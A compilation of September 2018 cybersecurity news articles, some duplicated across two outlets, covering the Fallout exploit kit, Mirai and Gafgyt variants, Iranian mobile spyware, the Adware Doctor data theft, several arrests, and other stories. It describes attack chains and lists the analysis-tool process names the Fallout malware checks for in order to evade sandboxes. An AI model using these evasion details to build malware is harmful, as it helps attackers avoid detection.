Fallout exploit kit appeared in the threat landscape in malvertising campaigns
10.9.2018 securityaffairs
Exploit

At the end of August, security experts discovered a new exploit kit called Fallout that is being used to distribute the GandCrab ransomware.
At the end of August, the threat analyst nao_sec discovered a new exploit kit called Fallout that is being used to distribute the GandCrab ransomware and other malicious codes, including droppers and potentially unwanted programs (PUPs).

Once deployed on a compromised website, the exploit kit leverages the CVE-2018-4878 Adobe Flash Player and the CVE-2018-8174Windows VBScript engine vulnerabilities to deliver a malware on the visitors’ machines.

“At the end of August 2018, we observed a new Exploit Kit. Its behavior (code generation using html) and URL pattern are similar to Nuclear Pack Exploit Kit. Therefore we named it “Fallout Exploit Kit”. Fallout Exploit Kit is using CVE-2018-4878 and CVE-2018-8174. That code is distinctive and interesting.” reads a blog post published by nao_sec.

At the time of the discovery, the exploit kit was delivering and installing the SmokeLoader downloader that was used to download the CoalaBot and another unidentified malware.

“The exe file executed by shellcode is “Nullsoft Installer self-extracting archive”. This will run SmokeLoader and two exe files will be downloaded” continues the analysis.

The Fallout exploit kit was also observed by FireEye in a malvertising campaign affecting users in Japan, Korea, the Middle East, Southern Europe, and other countries in the Asia Pacific region.

The security firm observed the exploit kit installing the GandCrab Ransomware on Windows machines, it was also used to redirect macOS users to pages promoting fake antivirus software or fake Adobe Flash Players.

fallout exploit kit

The exploit kit will first attempt to exploit VBScript, then it will try to exploit the Flash Player flaw.

Once the exploit code is executed, it will download and execute a Trojan onto Windows systems. The malicious code then enumerates all running processes, creates their crc32 checksums, and compare them against a list of blacklisted checksum associated with virtual machines and analysis tools such as:

vmwareuser.exe
vmwareservice.exe
vboxservice.exe
vboxtray.exe
Sandboxiedcomlaunch.exe
procmon.exe
regmon.exe
filemon.exe
wireshark.exe
netmon.exe
vmtoolsd.exe
If none of the above processes is running on the infected machine the Trojan will download and execute a DLL that installs the GandCrab ransomware.

Further details including the IoCs are included in both reports published by FireEye and nao_sec.


A growing number of iOS apps collect and sell location data
10.9.2018 securityaffairs Apple

A growing number of iOS apps currently collect location data, WiFi network IDs and other data, from iPhone users and sell them to monetization firms.
A group of security researchers that developed the popular Guardian mobile firewall app revealed that a growing number of iOS apps currently collect location data, WiFi network IDs and other data, from iPhone users and sell them to advertising companies.

Let me immediately highlight that these iOS apps collect data by asking users for permission to do it, but lack to inform users that gathered information are shared with third-party advertising and marketing companies.

The experts have observed that all these apps have embedded tracking codes provided by advertising and marketing firms.

“The GuardianApp team has discovered that a growing number of iOS apps have been used to covertly collect precise location histories from tens of millions of mobile devices, using packaged code provided by data monetization firms. In many cases, the packaged tracking code may run at all times, constantly sending user GPS coordinates and other information.” states the Guardian app research team.

“In order to gain initial access to precise data from the mobile device’s GPS sensors, the apps usually present a plausible justification relevant to the app in the Location Services permission dialog, often with little or no mention of the fact that location data will be shared with third-party entities for purposes unrelated to app operation.”
ios apps
Most of the apps asked for permission to access GPS coordinates, Bluetooth LE beacon data, and Wi-Fi SSID (Network Name) and BSSID (Network MAC Address).

Some apps also collect other types of device information, including accelerometer Information (X-axis, Y-axis, Z-axis), advertising Identifier (IDFA), battery Charge Percentage and Status (Battery or USB Charger), cellular Network MCC/MNC, cellular Network Name, GPS Altitude and/or Speed, timestamps for departure/arrival to a location.

The report published by the Guardian app team includes the names of 12 monetization firms that received data along with the names of 24 apps that use the tracking code provided by location data monetization firms.

The report also includes the names of 100 news apps containing monetization code provided by data monetization firm RevealMobile.

“In August 2017, RevealMobile was also found to be packaged in the AccuWeather app for a brief period of time and was criticized by users for collecting Wi-Fi SSID and BSSID from user’s even if Location Services access was denied (More:https://www.zdnet.com/article/accuweather-caught-sending-geo-location-data-even-when-denied-access/ ).” continues the report.

Experts also shared these potential mitigations:

Go to Settings > Privacy > Advertising and turn on Limit Ad Tracking in order to make uniquely identification of your iOS device more difficult for location trackers.
Press “Don’t Allow” if a Location Services permission dialog contains “See privacy policy” or similar text.
Use a very generic name for the SSID of your home Wi-Fi router (eg. “home-wifi-1”).
Turn off Bluetooth functionality when it is not in use.


Mirai and Gafgyt target Apache Struts and SonicWall to hit enterprises
10.9.2018 securityaffairs BotNet

Security experts with Unit 42 at Palo Alto Networks have discovered new variants of the Mirai and Gafgyt IoT malware targeting enterprises.
Both botnets appear very interesting for two main reasons:

The new Mirai variant targets the same Apache Struts vulnerability exploited in the 2017 Equifax data breach. The vulnerability affects the Jakarta Multipart parser upload function in Apache and could be exploited by an attacker to make a maliciously crafted request to an Apache web server.
The new Gafgyt variant targets a newly disclosed vulnerability affecting older, unsupported versions of SonicWall’s Global Management System (GMS).
The fact that bot malicious codes are targeting Apache Struts and SonicWall could indicate a shift from consumer device targets to enterprise targets.

“These developments suggest these IOT botnets are increasingly targeting enterprise devices with outdated versions.” reads the analysis published by Palo Alto Networks.

“All organizations should ensure they keep not only their systems up-to-date and patched, but also their IoT devices.”

In September the experts detected Mirai samples that include the exploit code for 16 vulnerabilities, for the first time the malware target vulnerability in Apache Struts.

The samples are hosted on a domain that in August resolved to a different IP address August. In August, the same IP address was intermittently hosting samples of Gafgyt that were including the exploit code to trigger the CVE-2018-9866 flaw affecting older versions of SonicWall Global Management System (GMS).

The same domain has also been found associated with other Mirai activity in the past.

“For part of the month of August 2018, that same domain resolved to a different IP address 185[.]10[.]68[.]127.” continues the analysis. “At that time we found that IP hosting samples of Gafgyt containing an exploit for a recently disclosed SonicWall vulnerability (CVE-2018-9866) affecting older, unsupported versions of SonicWall Global Management System (GMS) (8.1 and older) that is not present in currently supported versions.”

Experts noticed that the new Mirai samples don’t include the bruteforce functionality differently from other variants, they use l[.]ocalhost[.]host:47883 as C2, and implement the same encryption scheme as Mirai with the key 0xdeadf00d.

The Gafgyt samples first appeared in the wild on August 5, a few days after the publication of a Metasploit module for the SonicWall issue. The samples borrow the code from Gafgyt rather than Mirai.

“The incorporation of exploits targeting Apache Struts and SonicWall by these IoT/Linux botnets could be an indication of a larger movement from consumer device targets to enterprise targets.” concludes Palo Alto Networks.

Further details, including IoCs, are reported in the analysis published by the experts.


Android September 2018 Patches Fix Critical Flaws

10.9.2018 securityweek Android

Google has released its September 2018 security patches for Android, which resolves more than 50 vulnerabilities in the operating system.

The September 2018 Android Security Bulletin is split into two parts, the 2018-09-01 security patch level, which resolves 24 bugs, and the 2018-09-05 security patch level, which addresses a total of 35 bugs.

Five of the vulnerabilities patched with the 2018-09-01 security patch level were rated Critical severity. Three of these are elevation of privilege bugs that impact System, while the remaining two are remote code execution flaws in Media framework.

“The most severe of these issues is a critical security vulnerability in Media framework that could enable a remote attacker using a specially crafted file to execute arbitrary code within the context of a privileged process,” Google explains.

Google also addressed High risk vulnerabilities in Android runtime, framework, Library, Media framework and System, as well as two Medium severity issues in Media framework and System.

Most of the addressed vulnerabilities impact Android versions 7.0, 7.1.1, 7.1.2, 8.0, 8.1, and 9.0, but some were only found to affect Android 8.0 and newer platform releases.

Of the 35 flaws addressed with the 2018-09-05 security patch level, 6 are rated Critical severity, 27 are High risk flaws, and two are considered Medium severity.

The bugs were found in Framework, Kernel components, Qualcomm components, and Qualcomm closed-source components.

Last month, Google said that monthly patches are the recommended best practice for Android manufacturers and revealed that it has developed security update testing systems to ensure that vendors don’t omit patches when releasing security updates.

“Devices that use the security patch level of 2018-09-05 or newer must include all applicable patches in this (and previous) security bulletins,” Google notes in its latest advisory.

Also released this month, the September 2018 Pixel / Nexus Security Bulletin addresses a total of 15 vulnerabilities in Kernel and Qualcomm components. All of the bugs are rated Medium severity, Google reveals.

The update includes a series of functional patches for Google devices as well. Thus, the firmware release improves battery charge in Retail Mode on Pixel 2 and Pixel 2 XL, and also improves SW Version reporting and audio quality over car speakers on Pixel, Pixel XL, Pixel 2, and Pixel 2 XL devices.


Georgia Extradites Russian Data Theft Suspect to US
10.9.2018 securityweek BigBrothers

A 35-year-old Russian was extradited to the United States from Georgia on Friday to answer criminal charges over the massive theft of customer data from JPMorgan Chase and Dow Jones, officials announced.

Andrei Tyurin is accused of orchestrating major hacking crimes against US financial institutions, brokerage firms and financial news publishers, including the largest theft of customer data from a US financial institution.

US prosecutors say the schemes from 2012 to mid-2015 included the theft of personal information of over 100 million customers of the victim companies.

The scheme compromised data from millions of customers of JPMorgan Chase and other firms, previously identified as the Dow Jones media group and online brokers ETrade and Scottrade.

Tyurin, originally from Moscow, was arrested in Georgia at the request of US authorities, US officials said.

He faces 10 charges on multiple conspiracy counts, as well as wire fraud, aggravated identity theft and four counts of computer hacking. The most serious charges carry a maximum sentence of 30 years in prison.

Three other purported co-conspirators, Israeli citizens Gery Shalon and Ziv Orenstein, and American Joshua Aaron were arrested in 2015 and 2016.

Tyurin will appear before a Manhattan federal court later on Friday, with another scheduled court hearing on September 25, US prosecutors said.

His alleged hacking activities "lay claim to the largest theft of US customer data from a single financial institution in history, accounting for a staggering 80 million-plus victims," said US Attorney Geoffrey Berman.


Cyber Insurance Market to Double by 2020, Says Munich Re
10.9.2018 securityweek Cyber

The market for insurance against cyber threats will double by 2020 to over 8 billion dollars, German reinsurance giant Munich Re told a conference in Monaco on Sunday.

"Cyber risks are one of the biggest threats to the networked economy," Munich Re board member Torsten Jeworrek said in a statement on the first day of an annual meeting of reinsurers in the Mediterranean principality.

Munich Re estimated that companies could more than double their spending on cyber insurance from $3.4-$4 billion (3-3.4 billion euros) in 2017 to $8-$9 billion by 2020.

While the digital economy had increased productivity, "increased networking of machines, and equipment in particular, can also give rise to very complex risks such as data theft, disruptions in the interaction between networked machines, and even the failure of entire production lines and supply chains," Munich Re said, estimating the number of connected devices worldwide will rise from 27 billion to 125 billion by 2030.

"The economic costs of large-scale cyber attacks already exceeds losses caused by natural disasters. Where small and medium-sized enterprises are affected, such attacks can soon threaten their very existence," Munich Re warned.

The most damaging attacks to date, in economic terms, have been caused by malware such as WannaCry and NotPetya, which infected hundreds of thousands of computers around the world in 2017.

The malware encrypted data on hard drives, demanding that users pay ransoms to regain access to the system.

"This trend will continue as more and more machines and devices are connected," Munich Re warned.


The main source of infection on ICS systems was the internet in H1 2018
10.9.2018 securityaffairs ICS

Researchers from Kaspersky have published a new report on the attacks on ICS systems observed by its products in the first half of 2018.
Kaspersky Lab experts have published a new report titled “Threat Landscape for Industrial Automation Systems” report for H1 2018, that includes interesting data related to attacks against the ICS systems. The security firm detected over 19,400 samples belonging to roughly 2,800 malware families, most of which were not threats specifically designed to this category of devices.

Most of the malware was the result of random attacks rather than targeted operations conducted by nation-state actors.

The data confirms an increase in the attack against the ICS systems, 41.2% of the industrial control systems protected by Kaspersky. Compared to the first half of 2017, experts observed an overall increase of 5% in the number of attack attempts.

Most of the attacks were observed in the countries with a low pro capita GDP in Asia, Latin America, and North African, while the in the United States, only 21.4% of ICS systems were hit.

2018 h1 ICS systems attacks

The countries with the highest number of attacks by percentage were Vietnam (75.1 percent), Algeria (71.6 percent) and Morocco (65 percent), while the safest regions for ICS systems were Denmark (14 percent), Ireland (14.4 percent) and Switzerland (15.9 percent).

The main attack channel was the internet, 27 percent of attacks was originated from web sources, 8.4 percent leveraged removable storage media, and just 3.8 percent came from email clients.

“This pattern seems logical: modern industrial networks can hardly be considered isolated from external systems. Today, an interface between the industrial network and the corporate network is needed both to control industrial processes and to provide administration for industrial networks and systems,” Kaspersky added.

Most of the attacks involved Trojans using either Windows or web browsers as a platform.

“In H1 2018, threat actors continued to attack legitimate websites that had vulnerabilities in their web applications in order to host malware components on these websites,” Kaspersky said in the report. “Notably, the increase in the percentage of ICS computers attacked through browsers in H1 2018 was due to the increase in the number of attacks that involved JavaScript cryptocurrency miners. At the same time, the increase in the number of ICS computers attacked using Microsoft Office documents was associated with waves of phishing emails.”

More information about the attacks against ICS systems in H1 2018 are available in the the full version of the report (PDF)


Domestic Kitten – An Iranian surveillance operation under the radar since 2016
10.9.2018 securityaffairs APT

CheckPoint uncovered an extensive surveillance operation conducted by Iranian APT actor and tracked as Domestic Kitten aimed at specific groups of individuals.
Researchers at security firm CheckPoint uncovered an extensive surveillance operation conducted by Iranian APT actor and tracked as Domestic Kitten aimed at specific groups of individuals.

Cyber spies used malicious mobile apps that collect sensitive information on the target device and implements specific features to spy on the victims, such as recording the surrounding voices.

The attackers are spying on Iranian individuals that are Kurdish and Turkish natives, and ISIS supporters.

“Through the use of mobile applications, those behind the attack use fake decoy content to entice their victims to download such applications, which are in fact loaded with spyware, to then collect sensitive information about them.” reads the analysis published by CheckPoint.

“Interestingly, these targets include Kurdish and Turkish natives and ISIS supporters. Most interesting of all, though, is that all these targets are actually Iranians citizens.”

The list of information collected from the compromised devices is long and includes:

contact lists
call records
text and multimedia messages
browser history and bookmarks
geographical location
photos
recordings of nearby conversations
list of installed apps
clipboard content
data on external storage
The threat actor uses decoy applications which are believed to be of interest to the targets. The researchers discovered ISIS branded wallpaper changer, “updates” from the ANF Kurdistan news agency and a fake version of the Vidogram messaging app.

All the applications used in the campaign have the same certificate that was issued in 2016, the researchers confirmed that the extensive and targeted attacks are going on since 2016 and, until now, have remained under the radar due to the artful deception of the attackers towards their targets

The wallpaper changer aimed at the ISIS supported is designed to lure them by offering ISIS-related pictures to set as the screen background.

Domestic Kitten wallpaper_app

Data exfiltrated from the victim’s device are transferred to the C&C server via HTTP POST requests, it is encrypted with the AES algorithm and can be decrypted with a device ID that is unique for each victim.

One of the applications connects firmwaresystemupdate[.]com that is a newly registered website that was seen initially to resolve to an Iranian IP address but that later switched to a Russian address.

CheckPoint published the victim distribution, the cyberspies infected devices of at least 240 users most of them are Iranians (97%), the remaining are from in Afghanistan, Iraq and Great Britain.

“While the number of victims and their characteristics are detailed above, the number of people affected by this operation is actually much higher. This is due to the fact that the full contact list stored in each victim’s mobile device, including full names and at least one of their phone numbers, was also harvested by the attackers.” continues the analysis.“In addition, due to phone calls, SMS details, as well as the actual SMS messages, also recorded by the attackers, the private information of thousands of totally unrelated users has also been compromised.”

This means that the Domestic Kitten surveillance operation had collateral victims whose details were leaked from contact lists or conversations with the targets.

The researchers attributed the surveillance activity to the Iranian regime based on the political conditions in the region and the nature of the targets that pose a threat to the stability of the Government.

“Indeed, these surveillance programs are used against individuals and groups that could pose a threat to the stability of the Iranian regime. These could include internal dissidents and opposition forces, as well as ISIS advocates and the Kurdish minority settled mainly in Western Iran,” CheckPoint concludes.


Russian citizen behind JPMorgan Chase and Dow Jones attacks has been extradited to US
8.9.2018 securityaffairs BigBrothers

Andrei Tyurin, the man that is accused to be the responsible for major cyber attacks against financial institutions, including JPMorgan Chase, was extradited to the United States from Georgia.
The Russian citizen Andrei Tyurin (35) was extradited to the United States from Georgia on Friday, the man charged over the massive theft of customer data from JPMorgan Chase and Dow Jones, officials announced.


The man was arrested in Georgia at the request of US authorities, he faces 10 charges on multiple conspiracy counts, including wire fraud, aggravated identity theft and four counts of computer hacking.

Andrei Tyurin is accused of being the mastermind of the organization that targeted the US financial institution from 2012 to mid-2015.

“US prosecutors say the schemes from 2012 to mid-2015 included the theft of personal information of over 100 million customers of the victim companies.” states the AFP.

Crooks compromised data from millions of customers of financial firms, including JPMorgan Chase, the Dow Jones media group, and ETrade and Scottrade brokers.

His alleged hacking activities “lay claim to the largest theft of US customer data from a single financial institution in history, accounting for a staggering 80 million-plus victims,”

According to the US Attorney Geoffrey Berman, Tyurin and his accomplices’ activities “lay claim to the largest theft of US customer data from a single financial institution in history, accounting for a staggering 80 million-plus victims,”

The other components of the crime gang were already arrested in 2015 and 2016, they are the American Joshua Aaron and Israeli citizens Gery Shalon and Ziv Orenstein.

Tyurin will appear before a federal court later on September 25.


Police arrested Apophis Squad member responsible for ProtonMail DDoS attack
8.9.2018 securityaffairs Crime

UK NCA arrested a member of the Apophis Squad hacker group that launched distributed denial-of-service (DDoS) attacks against many organizations, including ProtonMail.
The U.K. National Crime Agency (NCA) announced the arrest of the 19-year-old George Duke-Cohan from Hertfordshire that was involved in the ProtonMail DDoS attack.

The teenager, aka “7R1D3N7,” “DoubleParallax” and “optcz1,”was arrested on August 31 and is still in custody after he pleaded guilty to three counts of making hoax bomb threats.

According to the investigator, the young man is the leader of the Apophis Squad, which is the hacking group that sent bomb threats to thousands of schools in the United Kingdom and the United States.

The group is also known for launching massive DDoS attacks against encrypted email provider ProtonMail, the popular investigator Brian Krebs, the DEF CON hacking conference, and government agencies worldwide.

The team was offering a DDoS-for-hire service that has many similarities with the booter implemented by the popular Lizard Squad hacking crew.

“Yesterday at Luton Magistrates Court, George Duke-Cohan, 19, pleaded guilty to three counts of making hoax bomb threats following an investigation by the National crime Agency.
Duke-Cohan sent the bomb threats that resulted in over 400 schools in the UK being evacuated in March 2018 for which he was arrested just days later.” reads the announcement published by the NCA.

“In April whilst under investigation, he sent a mass email to schools in the UK and the US claiming that pipe bombs had been planted on the premises.”

He has admitted making bomb threats to thousands of schools and a United Airlines flight travelling from the UK to San Francisco in August.

The NCA says the teenager, known online as “7R1D3N7,” “DoubleParallax” and “optcz1,” has also admitted making a prank call claiming that a United Airlines flight traveling from the U.K. to San Francisco had been hijacked by gunmen, including one carrying a bomb.

ProtonMail was hit by a massive DDoS attack in June that caused some delays to the operations of the company, the offensive was mitigated with the help of the security firm Radware.

Apophis Squad attack

ProtonMail Founder Andy Yen confirmed that his company helped law enforcement for identifying Duke-Cohan and other members of the group that were all ironically using the ProtonMail service.

Brian Krebs also provided precious information that helped the NCA in identifying the teenager in earlier August.

“What we found, combined with intelligence provided by renowned cyber security journalist Brian Krebs, allowed us to conclusively identify Duke-Cohan as a member of Apophis Squad in the first week of August, and we promptly informed law enforcement,” Protonmail wrote in a blog post.

“British police did not move to immediately arrest Duke-Cohan however, and we believe there were good reasons for that. Unfortunately, this meant that through much of August, ProtonMail remained under attack, but due to the efforts of Radware, ProtonMail users saw no impact.”

ProtonMail CEO believes further charges are pending, along with possible extradition to the US.

ProtonMail highlighted that it is committed to protecting the privacy of its users, but he will not accept that its service could be abused by cybercriminals.

“That’s why we will investigate to the fullest extent possible anyone who attacks ProtonMail or uses our platform for crime. We will also cooperate with law enforcement agencies within the framework of Swiss law,” warned ProtonMail.

“In recent weeks, we have further identified a number of other individuals engaged in attacks against ProtonMail, and we are working with the appropriate authorities to bring them to justice.”


Apple removed the popular app Adware Doctor because steals user browsing history
8.9.2018 securityaffairs Apple

Apple has removed one of the most popular anti-malware app called Adware Doctor:Anti Malware &Ad from the official macOS App Store
Apple has removed one of the most popular anti-malware app called Adware Doctor:Anti Malware &Ad from the official macOS App Store because it was gathering users’ browser histories and other sensitive data and then upload them to a remote server in China.

Adware Doctor the top paid utility in the official Mac App Store, it has a good reputation with thousands of reviews and a 4.8 star rating.

Ironically an application developed to protect Mac systems was exposing user personal data without his permission.

The unwanted behavior was spotted by a security researcher that goes online with Twitter account Privacy 1st, he discovered that Adware Doctor would gather browsing history from the Safari, Chrome, and the Firefox browsers, the search history on the App Store, and a list of running processes.

YouTube ‎@YouTube

Privacy 1st
@privacyis1st
Top Sold MacOS AppStore application is ROGUE. Adware Doctor is stealing your privacy. PoC: https://www.youtube.com/watch?v=nZ7CVIy5Tq8&feature=youtu.be …#malware #virus #MacOS #Apple #MacBook #MacBookPro #CyberSecurity #privacy #GDPR #Hacking #hackers #cyberpunk #Alert

8:30 AM - Aug 20, 2018
35
43 people are talking about this
Twitter Ads info and privacy
The expert discovered also that the gathered info was first stored in a password protected zip file named “history.zip”, then it would be uploaded to a remote server.

Privacy 1st shared his discovery with the former NSA white hat hacker Patrick Wardle that after conducting a personal review confirmed the findings of the researcher.

Below a video created by Privacy_1st to show his findings.

Patrick Wardle by redirecting DNS resolution was able to capture the exfiltrated data:

adware doctor

The history.zip file is exfiltrated to a remote to dscan.yelabapp.com that is hosted on Amazon AWS servers, but the analysis of the DNS entries confirms that it is administered by an entity in China.

The app was developed by an individual identified as “Yongming Zhang.” Wardle speculated that this may be a reference to “Zhang Yongming,” a Chinese serial killer.

Thomas Reed, director of Mac and mobile security at Malwarebytes, his firm is monitoring the activity of this developer since 2015.

“At that time, we discovered an app on the App Store named Adware Medic – a direct rip-off of my own highly-successful app of the same name, which became Malwarebytes for Mac,” Reed wrote.

“We immediately began detecting this, and contacted Apple about removing the app. It was eventually removed, but was replaced soon after by an identical app named Adware Doctor.”

Reed confirmed that similar data exfiltration methodology was observed in other products as well (i.e. “Open Any Files: RAR Support”, “Dr. Antivirus”, and ‘Dr. Cleaner”).

Unfortunately, Apple is allowing such kind of dubious behavior and is allowing similar app names that could generate confusion in the users.

“If Apple is really “review[ing] each app before it’s accepted by the store” … how were these grave (and obvious) violations of this application missed!?,” Wardle states in his blog post. “Who knows, and maybe this one just slipped though. Maybe we should give them the benefit of the doubt, as yes we all make mistakes!But this bring us to the next point. Apple also claims that “if there’s ever a problem with an app, Apple can quickly remove it from the store”. Maybe the key word here is “can”.”


Privacy-oriented Linux OS Tails 3.9 is out, what’s new?
8.9.2018 securityaffairs Privacy

The popular Debian-based distribution Tails “The Amnesiac Incognito Live System” is out. The Tails 3.9 is available online with the biggest updates this year.
A new version of the popular Debian-based distribution Tails “The Amnesiac Incognito Live System” is out. The Tails version 3.9 is available online, the privacy-oriented operating system gets its biggest update, many issues were fixed and new features were added to protect user privacy and anonymity online.

TAILS does not store information on the host Hard Disk, it is loaded entirely into RAM. This means that shutting down the machine all the data in RAM is deleted in a few minutes, leaving no trace on the system. To prevent Cold Boot Attack that allows experts to extract the content of the RAM memory before it will be deleted, but TAILS overwrites memory space with random data when shutting down the distro.

Tails 3.9 relies on Linux kernel 4.17 that includes security patches for the Foreshadow attacks as well as updated Intel and AMD microcode firmware to address the latest Spectre and Meltdown security flaws.

The development for the Tails 3.9 lasted at least two months, some of the features implemented were anticipated during the last weeks, such as the integration of the VeraCrypt/TrueCrypt utilities.

Integrating VeraCrypt or TrueCrypt users can easily manage encrypted disk drives directly from the GNOME desktop environment.

VeraCrypt integration comes with the recently released GNOME 3.30 desktop environment, unlock VeraCrypt encrypted volumes in Tails 3.9 is very easy. Users can access the new Unlock VeraCrypt Volumes dialog from Applications > System Tools. The features support both TrueCrypt or VeraCrypt open-source disk encryption format.

Tails 3.9 unlock-veracrypt-volumes-with-partition

Another feature implemented in the Tails 3.9 is the automatically installation for additional software.

This means that the distro will automatically install software updates when starting up the PC. Users could decide to install future updates of an app, and manage automatically updated apps from the menu entry Applications > System Tools > Additional Software.

Tails 3.9 includes Mozilla Thunderbird 60 as new default RSS and Atom news feed reader instead of Liferea, and the TOR Browser 8.0 anonymous web browser based on Firefox 60 ESR.

Get Tails 3.9
To install, follow our installation instructions.
To upgrade, automatic upgrades are available from 3.7.1, 3.8, and 3.9~rc1 to 3.9.If you cannot do an automatic upgrade or if Tails fails to start after an automatic upgrade, please try to do a manual upgrade.
Download Tails 3.9.
Tails 3.10 is expected on October 23, 2018.


Researchers Discover New "Fallout" Exploit Kit
8.9.2018 securityweek
Exploit

A recently discovered exploit kit (EK) has been used in a campaign targeting users in Japan, Korea, the Middle East, Southern Europe, and other countries in the Asia Pacific region.

Dubbed Fallout, the new EK has been targeting users in Japan with the SmokeLoader Trojan, but has been also observed delivering the GandCrab ransomware in the Middle East. Before dropping the payload, however, the EK fingerprints the browser profile to identify targets of interest.

Targeted users are redirected from a genuine advertiser page to the exploit kit landing page URL via multiple 302 redirects, FireEye’s security researchers have discovered.

Based on the user’s operating system and browser, the attack either delivered the EK directly or attempts to reroute the victim to other social engineering campaigns. macOS users in the United States, for example, are redirected to social engineering attempts posing either as anti-virus software or Flash updates.

“The strategy is consistent with the rise of social engineering attempts FireEye has been observing for some time, where bad actors use them to target users that are on fully patched systems or any OS/software profile that is not ideal for any exploit attempts due to software vulnerability,” the security firm notes.

The campaign, FireEye says, has been targeting entities in the government, telecom and healthcare sectors.

Fallout’s landing page only contained code for a VBScript vulnerability at first, but Flash embedding code was later added for it, the security researchers reveal. The VBScript loads a JScript function that decodes malicious next stage VBScript to exploit CVE-2018-8174 and executes shellcode that downloads, decrypts and executes a payload.

The dropped file contains PE loader code for initial loading and final payload execution. An unpacked DLL enumerates all running processes, creates their crc32 checksums, and tries to match them against a list of blacklisted checksums.

If any is found, the malware enters an infinite loop. If the check passes, a new thread is started. The malware checks its own image path, OS version, and architecture.

Depending on the Windows version and architecture, the malware attempts to take ownership of ctfmon.exe or rundll32.exe, or replace them with a copy of itself. It also adds itself to startup and reboots the system.

If it fails to replace the targeted system files successfully, the malware copies itself at a different location and then executes via ShellExecuteW.

The final payload in this attack is the GandCrab ransomware, which is being fetched and manually loaded into memory by the malware.

“In recent years, arrests and disruptions of underground operations have led to exploit kit activity declining heavily. Still, exploit kits pose a significant threat to users who are not running fully patched systems. Nowadays we see more exploit kit activity in the Asia Pacific region, where users tend to have more vulnerable software. Meanwhile, in North America, the focus tends to be on more straightforward social engineering campaigns,” FireEye concludes.


Opsec Mistakes Allowed U.S. to Link North Korean Man to Hacks
8.9.2018 securityweek BigBrothers

A 34-year-old North Korean national has been charged by U.S. authorities over his alleged involvement in the cyberattacks carried out by the Lazarus Group. An affidavit filed by an FBI special agent reveals how investigators linked the man to the notorious threat actor.

Park Jin Hyok has been charged with one count of conspiracy to commit computer fraud and abuse and one count of conspiracy to commit wire fraud. The FBI has added him to its Cyber Most Wanted list and the U.S. Department of Treasury announced sanctions against Park and the North Korean company he worked for.

The criminal complaint, filed on June 8 and made public on Thursday, describes both successful and unsuccessful campaigns of the Lazarus Group, but it focuses on four operations: the 2014 Sony Pictures Entertainment hack, the $81 million cyber heist from the central bank of Bangladesh in 2016, the 2017 WannaCry ransomware attack, and attempts to breach the systems of U.S. defense contractors in 2016 and 2017.

Governments and members of the cybersecurity industry previously linked most of these attacks to North Korea and the Lazarus Group (aka Hidden Cobra) based on shared code and infrastructure. However, the criminal complaint made public on Thursday reveals the apparent operational security (opsec) mistakes that led to investigators accusing Park of being involved in the campaigns.

Park is a North Korean programmer who until 2014, just before the Lazarus attack on Sony, worked in the China-based offices of Chosun Expo Joint Venture, also known as Korea Expo Joint Venture or KEJV. The company, which is said to be a front for the North Korean government, has been linked to the country’s military intelligence and it allegedly supports Pyongyang’s cyber activities.

According to investigators, Park worked at KEJV’s offices in Dalian, Liaoning, China, a province that borders North Korea. A résumé discovered by agents showed that he had been employed as a developer and that he had programming skills in – among many others – Visual C++, the language used to create many of Lazarus’ tools.

One of the personas used by Lazarus to set up its operations was “Kim Hyon Woo” and several links have been found between this moniker and Park’s online activities, including shared access to files, common names, and common IP addresses.

Links between Park Jin Hyok and Lazarus Group

Agents discovered that one of the email accounts used by Park, ttykim1018(at)gmail.com, and one account used by Kim Hyon Woo, tty198410(at)gmail.com, both had the “tty” string in their names.

But that’s not the only connection. One email had been added to the other’s address book and the Kim Hyon Woo address was the only one allowed to access an archive file saved in a remote file storage account associated with Park’s address.

Park’s address was also used to register a video account that shared profile information with a video account and a payment account created by Kim Hyon Woo.

Lazarus’ tty198410 account was used to register a Gmail account named mrkimjin123(at)gmail.com. This address is noteworthy as it incorporates both the Kim and Jin names.

Another email address, which Park apparently used for official KEJV communications, surigaemind(at)hotmail.com, received and sent messages addressed to and signed by a “Mr. Kim Jin” and “Kim Jin.”

Another important piece of evidence linking Park’s KEJV and personal accounts to Lazarus operational accounts registered by the Kim Hyon Woo persona is the discovery of common IP addresses – based in North Korea and elsewhere – that were used to access the accounts.

Investigators also discovered that the Brambul malware, which the U.S. recently attributed to Hidden Cobra, used various collector email accounts to store information stolen from compromised devices. The same North Korean IP address was used to access one of the Brambul collector accounts and KEJV-linked email accounts.

The complaint also reveals that Park is not the only subject of the FBI’s investigation into the Lazarus attacks and he likely was not the only individual with access to the analyzed accounts.


U.K. Teen Involved in ProtonMail DDoS Attack Arrested
8.9.2018 securityweek Crime

ProtonMail has helped law enforcement identify one of the members of the Apophis Squad, a group that has made bomb threats and launched distributed denial-of-service (DDoS) attacks against many organizations.

The U.K. National Crime Agency (NCA) announced this week that a 19-year-old from Hertfordshire was arrested on August 31. The teen, George Duke-Cohan, remains in custody after he pleaded guilty to three counts of making hoax bomb threats.

Duke-Cohan is said to be the leader of Apophis Squad, which has sent bomb threats to thousands of schools in the United Kingdom and the United States. The NCA says the teenager, known online as “7R1D3N7,” “DoubleParallax” and “optcz1,” has also admitted making a prank call claiming that a United Airlines flight traveling from the U.K. to San Francisco had been hijacked by gunmen, including one carrying a bomb.

While the charges in the U.K. focus on the hoax bomb threats, Apophis Squad is also known for launching DDoS attacks against encrypted email provider ProtonMail, cybersecurity journalist Brian Krebs, the DEF CON hacking conference, and government agencies in several countries. Its attacks and DDoS-for-hire services have apparently been inspired by the notorious Lizard Squad, whose members were also identified and charged by authorities.

ProtonMail reported in late June that it had been hit by a significant DDoS attack that caused some delays in the delivery of emails. The organization initially said a group linked to Russia had been behind the attack – Apophis Squad’s Twitter account claims the group is from Russia – but Radware, which helped ProtonMail mitigate the attack, later clarified that the attackers were actually based in the U.K.

In a blog post published on Thursday, ProtonMail Founder Andy Yen revealed that his organization helped authorities identify Duke-Cohan and other members of his group after learning that they had all been using ProtonMail.

It turns out that while Duke-Cohan and others claimed law enforcement would never be able to find them, they actually had poor operational security (opsec) practices and they even allowed their own servers to be breached.

Evidence collected from its own systems by ProtonMail and information from Brian Krebs helped identify Duke-Cohan as a member of Apophis Squad in the first week of August. However, British police only arrested him in late August after he threatened to make more bomb threats once school started in September.

The Twitter account used by Apophis Squad has not been active since August 31.

“We believe further charges are pending, along with possible extradition to the US,” Yen said.

ProtonMail aims to protect the privacy of its users, but warned that it does not protect individuals involved in criminal activities.

“That’s why we will investigate to the fullest extent possible anyone who attacks ProtonMail or uses our platform for crime. We will also cooperate with law enforcement agencies within the framework of Swiss law,” Yen said. “In recent weeks, we have further identified a number of other individuals engaged in attacks against ProtonMail, and we are working with the appropriate authorities to bring them to justice.”


